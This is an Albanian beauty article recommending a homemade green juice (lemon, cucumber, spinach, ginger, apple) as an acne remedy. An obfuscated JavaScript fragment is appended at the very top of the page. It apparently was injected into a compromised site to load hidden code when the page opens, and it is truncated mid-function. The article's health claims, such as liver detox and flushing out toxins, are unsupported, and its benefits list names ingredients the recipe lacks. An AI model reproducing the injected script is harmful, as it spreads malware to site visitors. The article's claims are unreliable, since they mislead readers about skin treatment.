;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ky lëng i gjelbërt do të bëjë mrekulli për lëkurën tuaj

By

Në fytyrën tonë shpesh mund të shfaqen aknet dhe puçrrat e mërzitshme, të cilat dijnë të na ulin vetëbesimin dhe të na mërzisin. Shpesh mundohemi të blejmë kremra të shtrenjtë dhe investojmë shumë kohë dhe para që lëkura jonë të duket e mrekullueshme.

Image result for green juice

Shpesh harrojmë që ky problem nuk zgjidhet vetëm nga ana e jashtme, por duhet zgjidhur edhe nga brenda me ushqimi të shëndetshëm e me plot vitamina.

Ekspertja e kozmetikës Abigail Jenkins, e cila kujdeset për bukurinë e shumë personaliteteve të famshme të Hollywoodit, ka zbuluar sekretin e vet të madh. Fjala është për lëngun e gjelbërt i cili pastron fytyrën.

Lëngu është aq i thjeshtë dhe mund ta konsumoni sa të doni nga rahatia e shtëpisë tuaj

Përbërësit:

  • gjysmë limoni
  • gjysmë kastraveci të vogël
  • një grusht spinaq të freskët
  • një lugë xhenxhefil të freskët të grirë
  • një mollë apo dardhë për ëmbëlsim
  • ujë

Image result for green juice

Përgatitja:

Të gjithë përbërësit i hidhni në blender apo në aparat për lëngje, bluani mirë derisa përbërësit të bashkohen dhe pastaj e pini.

Secili përbërës nga kjo pije ndikon në shërimin e akneve, në pengimin e proceseve të inflamacioneve të lëkurës.

Kastraveci – është i pasur me vitaminën A dhe me kalium, qetëson aknet dhe ftoh lëkurën.
Farat e marajës dhe xhenxhefili – janë përbërës antiinflamatorë.

Limoni – bën detoks të mëlçisë dhe i ndihmon t’i eliminojë helmet të cilat shkaktojnë inflamacionin e lëkurës.

Spinaqi dhe lakrat  – janë të pasura me klorofil dhe antioksidante, ndihmojnë lëkurën që të shërohet

Burimi: Glamour.com

Artikuj të ngjashëm